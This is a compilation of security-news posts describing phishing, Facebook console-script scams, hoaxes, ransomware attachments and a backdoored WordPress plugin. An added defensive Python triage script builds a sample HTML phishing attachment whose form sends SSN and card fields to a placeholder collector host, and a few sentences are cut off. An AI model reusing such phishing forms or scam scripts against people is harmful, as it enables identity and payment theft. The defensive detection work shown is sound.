Celine Dion's website becomes unusual spam launchpad, astonishes fans

Singer Celine Dion's website was recently showing something unusual. The Canadian vocalist’s website displayed hockey-related spam, surprising her fans all over the world.
(Photo credit: malwarebytes.org)


Partial text below:
///Fox Tv//Czech Republic vs Austria Live Stream Hockey World Championship Online
 
Watch Czech Republic vs Austria Wild live lead series 2015, TODAY Watch Canadiens vs. Senators Live Online Video Streaming, NHL playoffs 2015: Time, TV schedule and how to watch Game 3 online, Watch Czech Republic vs Austria Wild Stream Stanley Cup Playoffs Live Free Sports Live Streaming - Channel 1.Watch Czech Republic vs Austria Wild Stream Stanley Cup Playoffs Live - Free Sports Live Streaming - Channel 1.You can follow Game 2 with CBC Ottawa as Dan Séguin and Stu Mills live-tweet from inside and outside the Bell Centre in Montreal.Ottawa Senators Curtis Lazar gets hilt by Montreal Canadiens Alexi Emelin during first period action at the Bell .... LIVE: Ottawa Senator

It is somewhat unthinkable for the official sites of celebrities to serve as spam launchpads. Posts offering “online free video streaming” usually appear on sites which offer free registration and nonexclusive posts. Dion's site, therefore, is definitely an exception.

The spam was seen in the photo gallery on the celebrity’s website. It is similar to the posts described on the website ‘Malwarebytes Unpacked’, as it resembles the spam posts on Steam (and on blogging domains like Slideshare, Twitter, SoundCloud etc.).

The issue, however, is with a plugin that allows registered users of the site to upload fan photographs. The admins might have foreseen the spam images appearing with the clickable text. Visitors who click the spam link are then asked for personal information and payment details.

Beware of emails with resume attachments as Phishers still use JavaScript attachments


Beware of emails with an attached resume from a job applicant, because some hackers are still using old-style JavaScript attachments to deliver CryptoWall, which could leave people in great trouble.

In an article posted on the SpiderLabs Blog (Trustwave SEG Cloud), Brian Bebeau mentioned that a spam run of emails containing an attached resume from a job applicant was recently noticed. The attachment, with the file extension ‘.js’, was in plain text and consisted of JavaScript.

After some days, a second spam run was noticed which looked more serious and zipped the attachment. The hackers gave the attachment a MIME type of "image/png" so that it would appear to recipients to be an image.

If anyone retrieves the picture, it will turn out to be a Windows executable.

Bebeau wrote that after analysing the file, they found that it is a CryptoWall ransomware variant. So, anyone who opens the attachment to look at a resume or picture could end up with his/her entire system in trouble.

He added that some groups of spammers also use JavaScript to hide their phishing attachments. Instead of a resume, they use that old standby, the common account phish.

Bebeau wrote that people can verify an email by looking at the header addresses, before opening the attachments.

Subject lines include:

- Un-authorized User
- Verification Required
- Must verify your account
- Validate account

He said that the emails claim that the recipient's account has been limited or disabled, and that to restore the account, they must follow some steps in the attachment.

The attachment is an HTML file with a JavaScript section, and it instructs people to turn on JavaScript. If they view the attachment in a JavaScript-enabled browser, it creates a form which asks for their personal information.

The form asks for people's social security number and credit card number along with their name and address. If anyone fills it in and clicks the submit button, all of his/her data goes to a server in Russia.

According to Bebeau, if people examine an attachment carefully, it can be useful to pull out JavaScript code for content blocking.

He wrote that Trustwave SEG Cloud blocked around 200 of these phishing messages within three days. People should not turn on JavaScript even if some email asks them to do so.
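The three attachment tricks described in this article (a `.js` attachment, a part declared as `image/png` that is really a Windows executable, and an HTML attachment that uses JavaScript to build a form) can be checked on the raw message before anyone opens it. The following is an added example, not code from the SpiderLabs article; the sample message, its addresses, the `collector.example` URL and the finding labels are all constructed for illustration.

```python
import email
import re
from email import policy
from email.message import EmailMessage

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"          # first 8 bytes of every real PNG
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".wsf")
FORM_ACTION = re.compile(rb"""<form[^>]*\baction\s*=\s*["']?(https?://[^"'\s>]+)""", re.I)


def looks_like_pe(data):
    """True if data has a DOS 'MZ' header whose e_lfanew field points at 'PE\\0\\0'."""
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return False
    offset = int.from_bytes(data[0x3C:0x40], "little")
    return data[offset:offset + 4] == b"PE\x00\x00"


def triage_attachment(part):
    """Return a list of findings for one MIME part (an empty list means nothing flagged)."""
    findings = []
    name = (part.get_filename() or "").lower()
    declared = part.get_content_type()
    data = part.get_payload(decode=True) or b""

    if name.endswith(SCRIPT_EXTS):
        findings.append("script-extension")
    if looks_like_pe(data):
        findings.append("windows-executable declared as " + declared)
    elif declared == "image/png" and not data.startswith(PNG_MAGIC):
        findings.append("declared image/png but not a PNG")
    if declared == "text/html" or name.endswith((".html", ".htm")):
        if re.search(rb"<script\b", data, re.I):
            findings.append("html-with-script")
        for url in FORM_ACTION.findall(data):
            findings.append("form-posts-to " + url.decode("ascii", "replace"))
    return findings


def triage_message(raw_bytes):
    """Map each attachment filename in a raw RFC 5322 message to its findings."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    return {(p.get_filename() or "(unnamed)"): triage_attachment(p)
            for p in msg.iter_attachments()}


def build_sample():
    """Constructed test message: harmless stand-ins for the attachments described above."""
    msg = EmailMessage()
    msg["Subject"] = "My resume"
    msg["From"] = "applicant@example.com"
    msg["To"] = "hr@example.com"
    msg.set_content("Please find my resume attached.")
    # Plain-text JavaScript sent as an attachment.
    msg.add_attachment(b"var a = 1;", maintype="application",
                       subtype="javascript", filename="resume.js")
    # Minimal MZ/PE header stub (not a working program) labelled as a PNG.
    pe_stub = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00"
    msg.add_attachment(pe_stub, maintype="image", subtype="png", filename="photo.png")
    # A part that really does start with the PNG signature.
    msg.add_attachment(PNG_MAGIC + b"\x00" * 16, maintype="image",
                       subtype="png", filename="logo.png")
    # HTML attachment whose script writes a form posting to an outside server.
    html = ('<html><body><noscript>Turn on JavaScript to continue</noscript><script>'
            'document.write(\'<form action="http://collector.example/post.php">'
            '<input name="ssn"><input name="card"></form>\');</script></body></html>')
    msg.add_attachment(html, subtype="html", filename="verify.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for filename, findings in triage_message(build_sample()).items():
        print(filename, "->", findings or "nothing flagged")
```

The check compares what a part claims to be with what its first bytes say it is, so renaming the file or changing the declared MIME type does not hide an executable from it.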

Fake Facebook: Don't give your details away


A new phishing scam designed to steal your Facebook data has come to light. You might be receiving a mail or a message on social media asking you to recover your Facebook account, before it is permanently closed.

The scam is focused on getting Facebook credentials, along with the phone number and date of birth of a user. The scam came to light because of the bad English in the message.

Aside from that, the page where you enter your details (the phishing page) is hosted on the cloud sharing website Dropbox, allowing all the data you input to be conveniently collected for the hacker or hackers.

The details are then posted online on a .PHP page, preferably to be sold. No official word is yet out from Facebook on the matter, but www.blog.malwarebytes.org has cautioned users to be careful before responding to any such message, suspected to be from hackers.

Employee email accounts of Children's National Health System targeted with Phishing emails


Children's National became a victim of a cyber-attack, after its employees responded to phishing emails by hackers believing they were legitimate.

The issue came to light on December 26 last year and Children's National believes that any potential unauthorized access of its employees' email accounts could have taken place between July 26 and December 26 last year.

Children's National has come out to say that Patient History Information of various patients in the affected email accounts has been put at risk, and although it has not received any information regarding the misuse of this information, affected people are being informed to stay on the lookout for discrepancies in their insurance statement.

On learning of the incident, Children's National immediately secured the email accounts of the affected employees and began an investigation into the matter. They hired an external forensics firm to carry out the investigation.

They implemented new safety features and reviewed their systems to upgrade the security of their network. They have also set up a dedicated call centre with a helpline number for getting in touch with the affected patients.

Don't cook your iPhone with Microwave oven


There is an Internet hoax circulating which claims that users of Apple's iOS 8 can charge their iPhone by putting it in a microwave oven.

The hoax ad was posted on 4chan and stated "Wave is our latest and greatest addition to iOS8. Wave allows your device to be charged wirelessly through microwave frequencies.  Wave can be used to quickly charge your device's battery using any standard household microwave".

I don't think anyone will fall for this hoax. But it is funny to read the ad and tweets about it.

Last year, when iOS7 was first launched, some pranksters made a similar fake ad claiming updating to the iOS7 made phones waterproof.  Many people reportedly fell for that hoax.

Facebook hoax "Prayers for Like"


The message is a disgraceful hoax designed to get the maximum number of likes for a Facebook page and to promote it further through sharing of the message.

A baby's photograph was taken illegally from a personal Facebook profile and is being circulated without the parents' permission. Unfortunately, the baby in the photograph died two weeks after her birth. As the baby's picture is being circulated without the parents' permission, it is causing great pain to them. If this hoax message comes your way, do not like or share it. You are advised to report this particular message to Facebook.

According to the hoax message currently being distributed on Facebook, you can offer prayers to this baby girl by liking or sharing the picture. However, liking or sharing the message would not help the baby; in fact it would cause considerable distress to the parents and make them belligerent.

The people who create these messages are highly motivated by the green-eyed monster and look through the children whose pictures they misuse. Facebook pages with a large number of likes are traded on the black market, and can be sold to inhumane internet marketers and used to make further scam and hoax messages.

The belief in offering prayers for someone who is unfortunate is sane, but reciprocating it through social networking sites is simply absurd. Are we to believe the denigrating claim that “almighty has a deal with facebook that one share contributes hundred prayers?”

Not only this: the same thing can be seen on other pages which include images of Gods and Goddesses and ask for a like or comment to seek their blessings. Well, it is ironic that even the Almighty now needs likes, shares and comments on their images for blessing mankind. Huh. Well, my suggestion is: open your eyes and think broadly.

If this message comes your way, do not like, share or comment on such a post. It plays in favour of inhumane and immoral people who earn from such hoaxes.

The company needs to take action that ensures that these scam messages are removed from the network as quickly as possible.

Moreover, Facebook has actually removed some of the messages, as they have been reported a number of times. The company should ensure that these hoaxes are removed from the network as quickly as possible.

Phishing mail says 'DSVX virus' detected in Your Yahoo Mail


If you are getting emails saying that a virus has been detected in your Yahoo email account, ignore the emails.  It is nothing other than another tricky method used by cybercriminals to fool users.

Hoax-slayer has spotted a fake email claiming to be from Yahoo which informs recipients that a so-called DSVX virus has been detected in their Yahoo mail account and that they have to update their account.

The email warns the recipients that if they fail to update, they will lose access to their email address.

It also claims the update will give the latest spam protection, faster email and unlimited storage.

To update their email, it asks the recipients to send their username, email id, password, email security question and answer, country, phone number and date of birth by clicking the Reply button.

Keep in mind that neither Yahoo nor any other organization is ever going to ask you to send your username and password or any other sensitive data via an unsecured email.

Scam Alert: Your Facebook Accounts will be Permanently Disabled

We have seen large numbers of Facebook posts that promise something but turn out to be a scam.  Facebook users still believe these kinds of posts and blindly follow the instructions.  So, cyber criminals keep coming up with new themes to trick users.

Over the past few days, I have been receiving Facebook notifications informing me that one of my friends mentioned me in a comment.  I had a look at the post; it is nothing other than a Facebook scam.

The scam post says "to all facebook users Your Facebook Accounts will Permanent Disable. you must register your account to avoid permanent disabled . How to register? Go to our pinned post. and follow instructions carefully!" 

It asks you to copy and paste some code into the console of your browser.  By blindly following the scammers' instructions, users allow the scammers to perform various actions ('like', 'sharing', 'tagging friends' and more) on their behalf.

Earlier this year, we learned that scammers were tricking users by promising them that following the instructions would help them to hack their friends' accounts.

Cybercriminals abusing Microsoft Azure for phishing attacks


Cybercriminals usually host fake web pages on hacked websites and free web hosting; more recently they abused Google Docs.  These fake pages (phishing pages) trick unsuspecting users into handing over their personal and financial information.

Now, the cyber criminals have started to abuse Microsoft's Azure cloud platform to host their fake websites.

Creating accounts on Azure is very easy and a 30-day trial is also offered.  Once you are done with account creation, you can easily create your web pages using the main dashboard.

However, the registration process is not easy for criminals, because it requires a valid phone number and credit card details.

MalwareBytes researchers say the attackers may have stolen the usernames and passwords of legitimate users that were already registered.

Netcraft has identified several phishing pages hosted on Azure that target users of Paypal, Apple, Visa, American Express and Cielo.

PhishTank records:
http://www.phishtank.com/phish_detail.php?phish_id=2428419
http://www.phishtank.com/phish_detail.php?phish_id=2391951
http://www.phishtank.com/phish_detail.php?phish_id=2342647
http://www.phishtank.com/phish_detail.php?phish_id=2174737

Beware of fake versions of Malwarebytes Anti-Malware 2.0 claiming to be free


It is always suggested not to download cracked versions of software, if you are really concerned about your desktop security.  But downloading a cracked version of an antivirus, or downloading one from unknown sources, is the height of stupidity.

MalwareBytes recently released the new version 2.0 of MalwareBytes Anti-Malware (MBAM). Cyber criminals have now started to trick users into installing fake versions of this security application.

Researchers at Malwarebytes have come across a number of websites offering what claim to be free versions of their software, but are actually potentially unwanted programs.

These bogus applications are capable of making themselves run every time the system is restarted.  They are also capable of accessing your browser cookies, list of restricted sites and browser history.

These apps also block users from accessing certain websites by adding them to Internet Explorer's restricted zone; the blocked sites include wikia, gamespot and Runescape online.

The security firm has also spotted the premium version of MBAM with key generators on torrent websites.  But, in this particular case, users are asked to fill in a survey in order to download the app.  Filling in these kinds of surveys helps the cybercriminals to earn money.

Emails promising CNN article about HeartBleed vulnerability leads to Spam sites

Cyber criminals often take advantage of the hottest topics and latest events to entice users into visiting spam websites. The HeartBleed bug, which has made headlines over the past few weeks, is no exception.

Now, spammers are sending out emails with the subject "HeartBleed Bug warning". The spam campaign was discovered by security researchers at TrendMicro.

"I Just want to let you know there is a big security concern now in the internet.  The Internet bug called Heartbleed Bug, was recently discovered by experts.  So if were you, you need to change your internet passwords specially your banking passwords." The spam email reads.

"Check for this report in CNN. Report from CNN[LINK]"

If the link provided in the email led to the actual CNN report, the email might have been considered a cyber security awareness email.  But the link leads to a malicious webpage.

One good thing the spammers did is notify users about the HeartBleed vulnerability and suggest that recipients change their passwords.  If the link provided in the email.

Phishing pages trick Steam users to Upload SSFN file

Is a Steam login page asking you to upload an SSFN file? Think twice before uploading, because the legitimate Steam site never asks you to upload an SSFN file.

Steam Guard is an extra layer of security.  It will ask you to enter a verification code sent to your email whenever you try to log in from a computer you haven't used before.

This feature prevents attackers from taking control of your Steam account, even if they know your login id and password.

However, there is a new phishing scam uncovered by MalwareBytes that bypasses the Steam Guard protection.  It tricks users into handing over their login credentials and the SSFN file.

What is an SSFN file?
SSFN is the file that saves you from having to verify your identity through Steam Guard every time you log in to Steam on your computer.  If a user deletes this file, he will be asked to verify again, and a new SSFN file will be generated and stored on his PC.

If you upload your SSFN file to a phishing page, attackers can use this file together with your username and password to take control of your account.

In a reddit thread, several users have reported that they got fooled by this phishing scam.

"Steam will never ask you to provide any Steam Guard files. If you upload or give a user your Steam Guard .SSFN file, they can gain access to your account without accessing your email account. However, they must know your Steam account password and username to use this file" Valve article about Steam Guard reads.

European Apple users targeted with phishing emails

A new phishing campaign is targeting European users of the Apple store with the promise of a discount.

Security researchers at Kaspersky have spotted a new spam mail targeting Apple users, which tricks users into thinking that they can get discounts of 150 euros by just paying 9 euros.

"Apple is rewarding its long-term customers.  Your loyalty for our products made you eligible for buying an Apple discount card" The spam mail reads.

The spam mail asks users to download an attached HTML file and fill in the form, where users are asked to enter personal information as well as credit card information.

The scammers spoofed the email address so that the email appears to be from informs@apple.com.  They also promise to send the discount card within 24 hours of the form being filled in.

If a recipient follows the instructions and fills in the form, the phishing file will send the data to the attacker's server.  The attacker will use the given financial data.

Users targeted with large number of Spam mails containing Banking Trojan

 
A massive new spam campaign has been spotted by security researchers at AppRiver; it sends a large amount of spam mail to data centers in an effort to evade email-filtering engines.

AppRiver's data centers received 10 to 12 times normal traffic.  Even though AppRiver managed to block the spam mails, the tremendous volume of traffic caused some of its customers delays in sending and receiving emails.

Cybercriminals are targeting users with a large number of emails with varying premises.  One of the spam mails targets Bank of America customers.  A fake alert message pretending to be from Bank of America contains the Bredo malware.

Researchers say the malware is capable of recording keystrokes and stealing financial information.  It is also capable of downloading additional malware onto the victim's machine.  The spam mails were reportedly detected by only 11 out of 51 antiviruses.

Another mail analyzed by AppRiver pretends to be from "VISA/MasterCard" and informs recipients that their account has been blocked due to unusual activity.

Some of the malicious attached files pointed to the Andromeda botnet and others to the Bredo botnet.  This botnet activity is being referred to as TidalWave/TidalBotnet by AppRiver.

Facebook Scams: "Hacking any Facebook Account", "Facebook Music Theme"


A new Facebook scam which claims to be a script to "Hack any Facebook account" is spreading like wildfire.  Recently, I also came across a Facebook scam post that promises a "Facebook Music Theme". I've been tagged in the spam posts by more than 20 friends within a week.

The post has a link to a script file which is hosted on one of several services: Dropbox, Pastebin, textuploader and other file hosting services.

The post tricks users into thinking that it is a script to hack any Facebook account.  It urges users to use it before it gets blocked by Facebook.

It asks them to copy the script and paste it into the "console" section of the "inspect element" option in their browser.  It claims you will get the username and password once you have completed the process.


Here is what is actually happening:
When you paste and execute the code in the console section, it runs on your behalf.  So, it will send several requests, including "Like" and "comment" requests.  It means that you have unknowingly "liked" and "commented" on the scammer's pages.


It also tags all of your friends in a comment so that it can spread the scam further and get more victims.

I can't believe that there are still plenty of people out there who still believe some stupid scripts can hack accounts.

Are you one of the victims who followed the stupid instructions?
No need to panic.  As far as I know, the script only "likes" and "comments" on your behalf.  So, you can simply go to the "Activity" log page in your account and unlike and uncomment them.  If you are reading this article, make sure you do not make the same mistake again.

Facebook Scam: World's Largest Snake Video and Shark Eating Man Videos

Attention Facebook users! If you are seeing a Facebook post promising outrageous videos, for instance "Shocking video: World's Largest Snake Video", don't click it. It is nothing other than a survey scam.

There are various Facebook posts circulating with different bogus titles that lead to a survey scam page.

So far, the topics used in the scam campaign are "SHOCKING VIDEO World’s Largest Snake Found In [Brazil /Mexico ]" and "Exclusive: Shark eats the swimming man in an Ocean!! Watch the video".

Users who click the link in the post are taken to a web page where they are asked to complete a survey in order to view the video, and to share the video on their Facebook account.

At the end, you will get nothing other than being a victim of the scam.  Remember, there are no such videos.  If you come across these kinds of posts, just ignore them or report them to Facebook.

Spam mail promising Adobe License key delivers Trojan

Adobe has issued a warning about a new spam email campaign which purports to deliver license keys for a variety of Adobe products.

Security researchers at MX Lab have come across spam emails with subjects such as "Download your License Key" and "Than you for your order" that distribute a new Trojan.

The attacker managed to spoof the email address so that it appears to be from Adobe Inc.  The email thanks the recipient for buying various Adobe products and informs them that a "License Key" is attached to the email.


Those who are eagerly searching for a new license key will definitely open the attachment.  The attached file "License_Key_OR8957.zip" is nothing but malware.

At the time of writing, 27/49 antivirus engines detect it at VirusTotal.  It appears the cyber criminals are using the same technique from 2011.

Nigerian man jailed for $1.5 m phishing scam targeting students

A Nigerian man has been sentenced to three years and nine months for taking part in a $1.5 m phishing scam targeting UK students.

Olajide Onikoyi, a 29-year-old from Manchester, was one of the members of a criminal group that targeted students by sending phishing emails inviting them to update student loan details.

According to SKY News, he laundered £393,000 from 238 victims in total, including one student who had £19,000 taken from his account.

When the Metropolitan Police central e-crime unit seized his computers, they found chat logs that revealed he was conspiring with criminals in Russia, Lithuania and the UK.

A number of other people have also been jailed in connection with the scam.

Users are advised to use extreme caution when clicking links in unsolicited emails, and to log into websites directly by entering the URL of the site instead of clicking the link.

Halifax Bank phishing email claims "3rd party Intrusion detected"


A phishing email targeting users of UK-based Halifax Bank attempts to trick recipients into handing over their sensitive information.

The email informs the recipients that "3rd party intrusions" have been detected and their account has been limited for security reasons, according to Hoax-slayer.

To restore the account, it asks recipients to confirm their identity and verify that their account has not been used for fraud purposes, by filling in an online validation form.

Once the victim opens the link provided in the email, it takes them to a fake Halifax Bank website which asks them to log in.  Then, it asks victims to enter personal information such as name, phone number and birth date.

In the next form, they are asked to enter sensitive information such as account number, sort code, card number, expiration date and security code.

As usual in phishing scams, once the form is filled in, the victim is automatically redirected to the legitimate Halifax Bank website.

WordPress Plugins containing Backdoor distributed via phishing emails

If you are a WordPress user, what would you do when you receive an email offering the Pro version of a WordPress plugin for free? Don't get tempted by such emails; they also give malicious code for free!

Sucuri reported on phishing emails asking their clients to download the Pro version of the "All in one SEO Pack" WordPress plugin.  The email claims that the plugin is worth $79.00 and is being given away for free.

"You have been chosen by WordPress to take part in our Customer Rewarding Program.  You are the 23rd from 100 uniques winners." The phishing email reads.

Credit : Sucuri

The download link provided in the email does not point to the WordPress plugin store; it points to a zip file hosted on a compromised website.

Security researchers at Sucuri analyzed the plugin and found that it has been modified with a backdoor which gives attackers full access to the server.

The malicious code in the plugin replaces the index.php file with malicious code retrieved from the attacker's server.  So, when users visit the site, they are redirected either to spam sites or to exploit kits, which will infect the visitor's system.